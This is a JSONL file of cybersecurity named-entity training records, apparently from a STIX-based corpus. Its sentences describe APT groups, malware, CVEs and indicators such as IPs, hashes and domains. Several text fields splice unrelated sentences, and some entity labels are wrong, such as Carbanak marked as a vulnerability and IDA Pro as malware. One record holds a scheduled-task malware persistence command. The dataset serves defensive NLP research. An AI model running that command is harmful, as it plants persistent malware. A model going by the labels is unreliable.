Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information .", "spans": {"TOOL: DLL": [[4, 7]], "VULNERABILITY: CVE-2015-2546": [[72, 85]], "TOOL: Word": [[159, 163]], "MALWARE: Metasploit": [[249, 259]], "VULNERABILITY: exploit": [[356, 363]]}, "info": {"id": "cyberner_stix_train_000085", "source": "cyberner_stix_train"}} {"text": "Use of email theme related to the Geo-political events that is of interest to the targets .", "spans": {"TOOL: email": [[7, 12]]}, "info": {"id": "cyberner_stix_train_000086", "source": "cyberner_stix_train"}} {"text": "Below are some of the elements showing the relation . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . The domain , softfix.co.kr was registered in 2014 .", "spans": {"THREAT_ACTOR: APT10": [[100, 105]], "TOOL: Dropbox": [[140, 147]], "DOMAIN: softfix.co.kr": [[173, 186]]}, "info": {"id": "cyberner_stix_train_000087", "source": "cyberner_stix_train"}} {"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . 
This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed .", "spans": {"THREAT_ACTOR: cybercrime gang": [[17, 32]], "ORGANIZATION: banks": [[58, 63]], "ORGANIZATION: e-payment": [[66, 75]], "ORGANIZATION: financial institutions": [[88, 110]], "VULNERABILITY: Carbanak": [[160, 168]], "TOOL: Cobalt": [[173, 179]], "THREAT_ACTOR: Rocket Kitten": [[305, 318]], "THREAT_ACTOR: Infy": [[321, 325]], "THREAT_ACTOR: Sima": [[328, 332]]}, "info": {"id": "cyberner_stix_train_000088", "source": "cyberner_stix_train"}} {"text": "SCHTASKS /Create /f /SC minute /TN runawy /mo 5 /tr C:\\Users\\\\runawy.exe .", "spans": {"FILEPATH: C:\\Users\\\\runawy.exe": [[52, 78]]}, "info": {"id": "cyberner_stix_train_000089", "source": "cyberner_stix_train"}} {"text": "The app ties together two malware families - Desert Scorpion and another targeted surveillanceware family named FrozenCell - that we believe are being developed by a single , evolving surveillanceware actor called APT-C-23 targeting individuals in the Middle East . DHS has previously released Alert TA14-353A . Older versions of 7Zip also behave like PowerArchiver and WinRAR . 7Zip version 9.22 and older saw the executable as . 
Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"MALWARE: Desert Scorpion": [[45, 60]], "MALWARE: FrozenCell": [[112, 122]], "MALWARE: APT-C-23": [[214, 222]], "ORGANIZATION: DHS": [[266, 269]], "TOOL: 7Zip": [[330, 334], [379, 383]], "TOOL: PowerArchiver": [[352, 365]], "TOOL: WinRAR": [[370, 376]], "ORGANIZATION: threat researcher": [[450, 467]], "ORGANIZATION: CrowdStrike": [[479, 490]], "TOOL: MegaUpload": [[614, 624]], "TOOL: Twitter": [[635, 642]]}, "info": {"id": "cyberner_stix_train_000090", "source": "cyberner_stix_train"}} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "ORGANIZATION: Unit 42": [[230, 237]], "FILEPATH: EPS files": [[310, 319]], "VULNERABILITY: CVE-2015-2545": [[334, 347]], "VULNERABILITY: CVE-2017-0261": [[352, 365]]}, "info": {"id": "cyberner_stix_train_000091", "source": "cyberner_stix_train"}} {"text": "83be35956e5d409306a81e88a1dc89fd . 45.63.10.99 . 69.87.223.26 .", "spans": {"FILEPATH: 83be35956e5d409306a81e88a1dc89fd": [[0, 32]], "IP_ADDRESS: 45.63.10.99": [[35, 46]], "IP_ADDRESS: 69.87.223.26": [[49, 61]]}, "info": {"id": "cyberner_stix_train_000092", "source": "cyberner_stix_train"}} {"text": "Bdo is the Russian translation for RBS ( Remote Banking System ) so it is clear that RBS is a target for this malware . 
In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": {"TOOL: emails": [[266, 272]], "ORGANIZATION: government officials": [[283, 303]]}, "info": {"id": "cyberner_stix_train_000093", "source": "cyberner_stix_train"}} {"text": "Many other banking malware families followed suit and released their own Android malware components designed to steal those OTPs and TANs . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government .", "spans": {"THREAT_ACTOR: APT19": [[140, 145]], "MALWARE: Microsoft Excel files": [[197, 218]], "ORGANIZATION: FireEye": [[377, 384]], "THREAT_ACTOR: APT34": [[400, 405]]}, "info": {"id": "cyberner_stix_train_000094", "source": "cyberner_stix_train"}} {"text": "The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors : government , IT , military , defense , medicine , education , and engineering .", "spans": {"THREAT_ACTOR: STRONTIUM": [[21, 30]]}, "info": {"id": "cyberner_stix_train_000095", "source": "cyberner_stix_train"}} {"text": "While one family relies on a small number of supported commands and simple shells , the other delves into more convoluted methods of injections , checks , and supported feature sets . 
NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": {"MALWARE: NetTraveler": [[184, 195]], "ORGANIZATION: diplomats": [[220, 229]], "ORGANIZATION: embassies": [[232, 241]], "ORGANIZATION: government institutions": [[246, 269]]}, "info": {"id": "cyberner_stix_train_000096", "source": "cyberner_stix_train"}} {"text": "] 230 [ . The Dukes could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available . Once the raw contents of the pastebin.com post were downloaded , that data would also be executed in memory . \" Iran often adopts an asymmetric warfare strategy to accomplish its political and military goals , and its development of cyberwarfare capabilities adds to this asymmetric toolkit , allowing the country a lowcost means to conduct espionage and attack stronger adversaries .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19]], "TOOL: CosmicDuke": [[49, 59]], "DOMAIN: pastebin.com": [[213, 225]], "THREAT_ACTOR: Iran": [[296, 300]]}, "info": {"id": "cyberner_stix_train_000097", "source": "cyberner_stix_train"}} {"text": "The APC routine creates a thread in the context of the svchost.exe process that will map and execute the stage 5 malware into the winlogon.exe process . The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The launcher binary , which contains the final backdoor , is RC4 encrypted and wrapped in a layer of obfuscated shellcode . 
Adversaries may manipulate control systems devices or possibly leverage their own , to communicate with and command physical control processes .", "spans": {"ORGANIZATION: political": [[199, 208]], "ORGANIZATION: military": [[211, 219]], "ORGANIZATION: defense industry": [[224, 240]]}, "info": {"id": "cyberner_stix_train_000098", "source": "cyberner_stix_train"}} {"text": "Going back to the PowerShell command , the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output .", "spans": {"TOOL: PowerShell": [[18, 28]]}, "info": {"id": "cyberner_stix_train_000099", "source": "cyberner_stix_train"}} {"text": "Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails .", "spans": {"ORGANIZATION: social media": [[64, 76]]}, "info": {"id": "cyberner_stix_train_000100", "source": "cyberner_stix_train"}} {"text": "With the malware now in place , a number of actions can be performed , including allowing attackers to secretly monitor and control smartphones via a backdoor , send messages to premium-rate numbers , and intercept two-factor authentication codes sent by online banking apps and the like . There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . 
Typically this event occurs a few times to several times , Honeypot Alerts Set up a honeypot mechanism to attract interest from adversaries .", "spans": {"THREAT_ACTOR: Gallmaker": [[396, 405]], "ORGANIZATION: defense": [[436, 443]], "ORGANIZATION: military": [[446, 454]], "ORGANIZATION: government sectors": [[461, 479]]}, "info": {"id": "cyberner_stix_train_000101", "source": "cyberner_stix_train"}} {"text": "The user ’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques .", "spans": {}, "info": {"id": "cyberner_stix_train_000102", "source": "cyberner_stix_train"}} {"text": "The use of tools not previously observed by CTU researchers suggests that the group could have access to malware development capabilities .", "spans": {"ORGANIZATION: CTU": [[44, 47]]}, "info": {"id": "cyberner_stix_train_000103", "source": "cyberner_stix_train"}} {"text": "The class “ org.starsizew.Ac ” is designed for this purpose ; its only task is to check if the main service is running , and restart the main service if the answer is no . The campaign appears highly targeted and delivers a backdoor we have called ' Helminth ' . First of all the macro will set the registry key “ HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\ ” & Application.Version & _ ” \\Word\\Security\\ ” and then will set up two scheduled tasks that will start respectively every 12 and 15 minutes : the first one will run a “ IndexOffice.vbs ” in the path “ %APPDATA%\\Microsoft\\Office\\ ” and the second one will run “ IndexOffice.exe ” in the same path . 
\" If you ve read about recent cyber attacks in the news , you might be wondering why cyber criminals try to hack into other systems and what motivates them .", "spans": {"TOOL: Helminth": [[250, 258]], "TOOL: macro": [[280, 285]], "FILEPATH: IndexOffice.vbs": [[528, 542]], "FILEPATH: IndexOffice.exe": [[618, 632]], "THREAT_ACTOR: cyber criminals": [[739, 754]]}, "info": {"id": "cyberner_stix_train_000104", "source": "cyberner_stix_train"}} {"text": "The dropper drops the Spark backdoor binary and a shortcut file used to initiate persistence in the following locations .", "spans": {"MALWARE: Spark backdoor": [[22, 36]]}, "info": {"id": "cyberner_stix_train_000105", "source": "cyberner_stix_train"}} {"text": "Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe .", "spans": {"MALWARE: decoy documents": [[21, 36]], "ORGANIZATION: Cambodia Government": [[119, 138]], "ORGANIZATION: Facebook": [[167, 175]], "FILEPATH: More_eggs malware": [[209, 226]], "FILEPATH: cmd.exe": [[310, 317]]}, "info": {"id": "cyberner_stix_train_000106", "source": "cyberner_stix_train"}} {"text": "We were able to identify several victims in this Operation AppleJeus sequel .", "spans": {}, "info": {"id": "cyberner_stix_train_000107", "source": "cyberner_stix_train"}} {"text": "X-Force IRIS researchers further identified that the threat actor behind the malicious documents served many of them using a URL-shortening scheme in the following pattern : briefl.ink/{a-z0-9}[5] .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "URL: briefl.ink/{a-z0-9}[5]": [[174, 196]]}, "info": {"id": "cyberner_stix_train_000108", "source": "cyberner_stix_train"}} {"text": "An APT gang linked to China and alleged to be responsible for targeted attacks 
against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym – Nymaim – appear up to the task .", "spans": {"THREAT_ACTOR: APT": [[3, 6]], "THREAT_ACTOR: gang": [[7, 11]], "ORGANIZATION: governments": [[95, 106]], "ORGANIZATION: bank": [[338, 342]], "ORGANIZATION: Kessem": [[378, 384]], "MALWARE: GozNym": [[409, 415]]}, "info": {"id": "cyberner_stix_train_000109", "source": "cyberner_stix_train"}} {"text": "As discussed in the Actions on objectives section , the threat actors appear to wait until they have established a foothold .", "spans": {}, "info": {"id": "cyberner_stix_train_000110", "source": "cyberner_stix_train"}} {"text": "How it works When the malware is first started on the device it will begin by removing its icon from the app drawer , hiding from the end user . APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft . 
9002 is the infamous RAT frequently seen in targeted attacks reported by various security vendors , including Palo Alto Networks .", "spans": {"THREAT_ACTOR: APT10": [[145, 150]], "ORGANIZATION: healthcare": [[177, 187]], "ORGANIZATION: defense": [[190, 197]], "ORGANIZATION: aerospace": [[200, 209]], "ORGANIZATION: government": [[212, 222]], "ORGANIZATION: heavy industry": [[225, 239]], "ORGANIZATION: mining": [[244, 250]], "ORGANIZATION: MSPs": [[257, 261]], "ORGANIZATION: IT services": [[266, 277]], "ORGANIZATION: sectors": [[297, 304]], "MALWARE: 9002": [[350, 354]], "ORGANIZATION: Palo Alto Networks": [[460, 478]]}, "info": {"id": "cyberner_stix_train_000111", "source": "cyberner_stix_train"}} {"text": "It also has engaged in network reconnaissance against targets of interest to TEMP.Veles .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[77, 87]]}, "info": {"id": "cyberner_stix_train_000112", "source": "cyberner_stix_train"}} {"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . TClient is actually one of Tropic Trooper 's other backdoors .", "spans": {"TOOL: technical exploitation capabilities": [[29, 64]], "VULNERABILITY: zero-day exploits": [[131, 148]], "MALWARE: TClient": [[325, 332]]}, "info": {"id": "cyberner_stix_train_000113", "source": "cyberner_stix_train"}} {"text": "] 205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60 [ . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document . 
This cloud service-based backdoor contains many features .", "spans": {"MALWARE: Bisonal": [[95, 102]]}, "info": {"id": "cyberner_stix_train_000114", "source": "cyberner_stix_train"}} {"text": "Rotexy may start requesting device administrator privileges again in an infinite loop ; in that case , restart the device in safe mode and remove the malicious program . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy .", "spans": {"MALWARE: Rotexy": [[0, 6]], "MALWARE: Careto": [[170, 176]], "THREAT_ACTOR: Leviathan": [[281, 290]], "ORGANIZATION: universities": [[363, 375]], "ORGANIZATION: military": [[381, 389]], "ORGANIZATION: Navy": [[433, 437]]}, "info": {"id": "cyberner_stix_train_000115", "source": "cyberner_stix_train"}} {"text": "Reduce privileges to only those needed for a user 's duties .", "spans": {}, "info": {"id": "cyberner_stix_train_000116", "source": "cyberner_stix_train"}} {"text": "After gaining access to each of the IoT devices , the actor ran tcpdump to sniff network traffic on local subnets .", "spans": {"TOOL: IoT": [[36, 39]]}, "info": {"id": "cyberner_stix_train_000117", "source": "cyberner_stix_train"}} {"text": "The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order , heightening the possibility of a deliberate effort to mask its origins .", "spans": {"TOOL: ZIP": [[46, 49]]}, "info": {"id": "cyberner_stix_train_000118", "source": "cyberner_stix_train"}} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . 
The Magic Hound has repeatedly used social media to identify and interact with employees at targeted organizations and then used weaponized Excel documents .", "spans": {"MALWARE: them": [[22, 26]], "ORGANIZATION: social media": [[199, 211]], "ORGANIZATION: employees": [[242, 251]]}, "info": {"id": "cyberner_stix_train_000119", "source": "cyberner_stix_train"}} {"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "ORGANIZATION: CTU": [[56, 59]], "VULNERABILITY: zero-day": [[114, 122]]}, "info": {"id": "cyberner_stix_train_000120", "source": "cyberner_stix_train"}} {"text": "Apple has confirmed that the iOS apps are not functioning based on analysis of the codes , and stated that the sandbox is able to detect and block these malicious behaviors . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . #3 and #4 as successors of #11 ) While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month ’s review we speculated that Royal might be going through a rebrand .", "spans": {"ORGANIZATION: Apple": [[0, 5]], "SYSTEM: iOS": [[29, 32]], "ORGANIZATION: CSIS": [[225, 229]], "VULNERABILITY: Carbanak": [[263, 271]], "ORGANIZATION: customers": [[301, 310]], "THREAT_ACTOR: Royal": [[493, 498]]}, "info": {"id": "cyberner_stix_train_000121", "source": "cyberner_stix_train"}} {"text": "Each of them consists of a set of plugins designed for different tasks : while FuzzBunch plugins are responsible for reconnaissance and attacking a victim , plugins in the DanderSpritz framework are developed for managing already infected victims . 
In 2016 , for instance , we found their campaigns attacking Japanese organizations with various malware tools , notably the Elirks backdoor .", "spans": {"TOOL: FuzzBunch plugins": [[79, 96]], "TOOL: DanderSpritz": [[172, 184]], "MALWARE: Elirks backdoor": [[373, 388]]}, "info": {"id": "cyberner_stix_train_000122", "source": "cyberner_stix_train"}} {"text": "Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"MALWARE: IDA Pro": [[15, 22]], "MALWARE: WinDbg": [[27, 33]], "THREAT_ACTOR: Lazarus Group": [[170, 183]], "MALWARE: WannaCry": [[204, 212]], "ORGANIZATION: Microsoft customers": [[257, 276]]}, "info": {"id": "cyberner_stix_train_000123", "source": "cyberner_stix_train"}} {"text": "Rar.exe : Legitimate WinRAR , 26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd . atec.exe : Compiled Impacket atexec tool , a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10 . dmp.exe : Dumpert tool , e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e .", "spans": {"FILEPATH: Rar.exe": [[0, 7]], "TOOL: WinRAR": [[21, 27]], "FILEPATH: 26d9212ec8dbca45383eb95ec53c05357851bd7529fa0761d649f62e90c4e9fd": [[30, 94]], "FILEPATH: atec.exe": [[97, 105]], "TOOL: Impacket": [[117, 125]], "FILEPATH: a4aca75bcc8f18b8a2316fd67a7e545c59b871d32de0b325f56d22584038fa10": [[140, 204]], "FILEPATH: dmp.exe": [[207, 214]], "TOOL: Dumpert": [[217, 224]], "FILEPATH: e4e05c9a216c2f2b3925293503b5d5a892c33db2f6ea58753f032b80608c3f2e": [[232, 296]]}, "info": {"id": "cyberner_stix_train_000124", "source": "cyberner_stix_train"}} {"text": "If your account has been breached , the following steps are required : A clean installation of an operating system on your mobile device is required ( a process called “ flashing ” ) . 
Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity . it is replaced with another expression for the deobfuscation . What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": {"THREAT_ACTOR: APT38": [[210, 215]], "THREAT_ACTOR: TEMP.Hermit": [[220, 231]], "THREAT_ACTOR: operational groups": [[298, 316]], "THREAT_ACTOR: MiniDuke attackers": [[474, 492]]}, "info": {"id": "cyberner_stix_train_000125", "source": "cyberner_stix_train"}} {"text": "To further illustrate , here is a timeline of Operation Emmental and its potential relationship to OSX_DOK.C :", "spans": {"MALWARE: OSX_DOK.C": [[99, 108]]}, "info": {"id": "cyberner_stix_train_000126", "source": "cyberner_stix_train"}} {"text": ": A9 : D5:95 : A9:91 : C2:91:77:5D:30 : F6 SHA1 Hash : 32:17 : E9:7E:06 : FE:5D:84 : BE:7C:14:0C : C6:2B:12:85 : E7:03:9A:5F The app requests extensive permissions during installation that enable a range of activities supported by the malware . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart . 
MITRE has also developed an APT3 Adversary Emulation Plan .", "spans": {"MALWARE: link file": [[254, 263]], "MALWARE: AutoHotkeyU32.exe": [[290, 307]], "ORGANIZATION: MITRE": [[371, 376]], "THREAT_ACTOR: APT3": [[399, 403]]}, "info": {"id": "cyberner_stix_train_000127", "source": "cyberner_stix_train"}} {"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": {"THREAT_ACTOR: TG-3390": [[26, 33]], "TOOL: strategic web compromises": [[43, 68]], "TOOL: SWCs": [[71, 75]]}, "info": {"id": "cyberner_stix_train_000128", "source": "cyberner_stix_train"}} {"text": "Lookout said in its own blog post published Wednesday that its threat detection network has recently observed a surge of Shedun attacks , indicating the scourge wo n't be going away any time soon . The researchers found that there are common elements in the macro and in the first- stage RAT used in this campaign , with former campaigns of the NICKEL ACADEMY ( Lazarus ) threat group . APT33 : 192.119.15.35 [REDACTED].ddns.net . 
The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Shedun": [[121, 127]], "TOOL: RAT": [[288, 291]], "THREAT_ACTOR: NICKEL ACADEMY": [[345, 359]], "THREAT_ACTOR: Lazarus": [[362, 369]], "THREAT_ACTOR: threat group": [[372, 384]], "THREAT_ACTOR: APT33": [[387, 392]], "IP_ADDRESS: 192.119.15.35": [[395, 408]], "DOMAIN: [REDACTED].ddns.net": [[409, 428]], "THREAT_ACTOR: threat actor": [[435, 447]], "THREAT_ACTOR: threat actors": [[604, 617]]}, "info": {"id": "cyberner_stix_train_000129", "source": "cyberner_stix_train"}} {"text": "Sample configuration file of the Trojan Through AccessibilityService , the malware monitors AccessibilityEvent events . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . As in the previous version , the ID of the infected system is generated with exactly the same method .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[142, 172]], "MALWARE: njRAT backdoor": [[221, 235]]}, "info": {"id": "cyberner_stix_train_000130", "source": "cyberner_stix_train"}} {"text": "Instead , in Version 0.0.0.2 , EventBot dynamically loads its main module . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . 
In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch .", "spans": {"MALWARE: EventBot": [[31, 39]], "MALWARE: sample": [[222, 228]], "VULNERABILITY: CVE-2017-11882": [[248, 262], [352, 366]], "VULNERABILITY: CVE-2018-0802": [[266, 279]], "THREAT_ACTOR: APT34": [[301, 306]], "TOOL: Microsoft Office": [[321, 337]], "MALWARE: POWRUNER": [[377, 385]], "MALWARE: BONDUPDATER": [[390, 401]], "ORGANIZATION: Microsoft": [[425, 434]]}, "info": {"id": "cyberner_stix_train_000131", "source": "cyberner_stix_train"}} {"text": "Usually , PHA authors attempt to install their harmful apps on as many devices as possible . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the Leafminer . APT33 : 192.119.15.35 [REDACTED].ddns.net . The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": {"TOOL: public web shell": [[196, 212]], "THREAT_ACTOR: Leafminer": [[228, 237]], "THREAT_ACTOR: APT33": [[240, 245]], "IP_ADDRESS: 192.119.15.35": [[248, 261]], "DOMAIN: [REDACTED].ddns.net": [[262, 281]], "ORGANIZATION: security experts": [[320, 336]], "ORGANIZATION: journalists": [[341, 352]], "ORGANIZATION: Ashley Madison executives": [[355, 380]], "ORGANIZATION: victims of the breach": [[383, 404]], "ORGANIZATION: jilted spouses": [[409, 423]]}, "info": {"id": "cyberner_stix_train_000132", "source": "cyberner_stix_train"}} {"text": "FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year . 
Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "FILEPATH: Attachments": [[104, 115]]}, "info": {"id": "cyberner_stix_train_000133", "source": "cyberner_stix_train"}} {"text": "The campaigns used a mix of attached zipped scripts ( WSF , VBS ) , malicious Microsoft Office documents ( Word , Excel ) , HTML attachments , password-protected Microsoft Word documents , links to malicious JavaScript , and other vectors .", "spans": {"TOOL: zipped": [[37, 43]], "TOOL: WSF": [[54, 57]], "TOOL: VBS": [[60, 63]], "ORGANIZATION: Microsoft": [[78, 87], [162, 171]], "TOOL: Office": [[88, 94]], "TOOL: Word": [[107, 111], [172, 176]], "TOOL: Excel": [[114, 119]], "TOOL: HTML": [[124, 128]], "TOOL: JavaScript": [[208, 218]]}, "info": {"id": "cyberner_stix_train_000134", "source": "cyberner_stix_train"}} {"text": "The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial .", "spans": {"TOOL: downloader malware": [[4, 22]], "FILEPATH: Acunetix Web Vulnerability Scanner": [[143, 177]]}, "info": {"id": "cyberner_stix_train_000135", "source": "cyberner_stix_train"}} {"text": "We detect the malware used in this attack as “ Backdoor.AndroidOS.Chuli.a ” . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . 
On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents .", "spans": {"MALWARE: Backdoor.AndroidOS.Chuli.a": [[47, 73]], "THREAT_ACTOR: The Lamberts": [[123, 135]], "ORGANIZATION: ITSec community": [[175, 190]], "ORGANIZATION: FireEye": [[226, 233]], "VULNERABILITY: zero day vulnerability": [[263, 285]], "VULNERABILITY: CVE-2014-4148": [[288, 301]], "THREAT_ACTOR: actor": [[333, 338]], "MALWARE: Clayslide delivery documents": [[388, 416]]}, "info": {"id": "cyberner_stix_train_000136", "source": "cyberner_stix_train"}} {"text": "Additionally , the apparent timezone of the timestamps in all of the GeminiDuke samples compiled during the winter is UTC+3 , while for samples compiled during the summer , it is UTC+4 .", "spans": {"MALWARE: GeminiDuke": [[69, 79]]}, "info": {"id": "cyberner_stix_train_000137", "source": "cyberner_stix_train"}} {"text": "Those vulnerabilities could have enabled someone to gain broad access to an Android device . This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains . NamelessHdoor : dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f .", "spans": {"SYSTEM: Android": [[76, 83]], "THREAT_ACTOR: APT10": [[152, 157]], "MALWARE: NamelessHdoor": [[242, 255]], "FILEPATH: dfc8a6da93481e9dab767c8b42e2ffbcd08fb813123c91b723a6e6d70196636f": [[258, 322]]}, "info": {"id": "cyberner_stix_train_000138", "source": "cyberner_stix_train"}} {"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . 
Over the years they've used application components from Norman , McAfee and Norton .", "spans": {"TOOL: Word": [[32, 36]], "VULNERABILITY: CVE-2015-2545": [[147, 160]], "THREAT_ACTOR: attacker": [[194, 202]], "ORGANIZATION: Norman": [[332, 338]], "ORGANIZATION: McAfee": [[341, 347]], "ORGANIZATION: Norton": [[352, 358]]}, "info": {"id": "cyberner_stix_train_000139", "source": "cyberner_stix_train"}} {"text": "One reason for the distinction may be differences in evidence , as FireEye ’s public reporting notes two distinct events of which they are aware of and have responded to related to “ the TRITON actor ” while Dragos has been engaged several instances – thus , Dragos would possess more evidence to cement the definition of an activity group , while FireEye ’s data collection-centric approach would require far more observations to yield an “ APT ” .", "spans": {"ORGANIZATION: FireEye": [[67, 74], [348, 355]], "MALWARE: TRITON": [[187, 193]], "ORGANIZATION: Dragos": [[208, 214], [259, 265]]}, "info": {"id": "cyberner_stix_train_000140", "source": "cyberner_stix_train"}} {"text": "For example , the password \" admin-windows2014 \" shown in Figure 14 was changed to \"admin-windows2015\" for TG-3390 intrusions conducted in 2015 .", "spans": {"THREAT_ACTOR: TG-3390": [[107, 114]]}, "info": {"id": "cyberner_stix_train_000141", "source": "cyberner_stix_train"}} {"text": "Figure 2 – Granting Permissions The following permissions are granted to the app : Figure 3 – Permissions Granted to App A closer look at the code reveals the application gathers a list of installed applications to compare the results against a list of targeted applications ( Figure 4 ) . However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number . 
The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"ORGANIZATION: Symantec": [[320, 328]], "THREAT_ACTOR: CopyPaste": [[532, 541], [649, 658]], "ORGANIZATION: victims": [[729, 736]], "TOOL: NetSupport RAT": [[785, 799]]}, "info": {"id": "cyberner_stix_train_000142", "source": "cyberner_stix_train"}} {"text": "2c50eedc260c82dc176447aa4116ad37112864f4e1e3e95c4817499d9f18a90d .", "spans": {"FILEPATH: 2c50eedc260c82dc176447aa4116ad37112864f4e1e3e95c4817499d9f18a90d": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000143", "source": "cyberner_stix_train"}} {"text": "Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns . The downloaded document has a “ .dot ” extension , used by Microsoft Office to save templates for different documents with similar formats . 
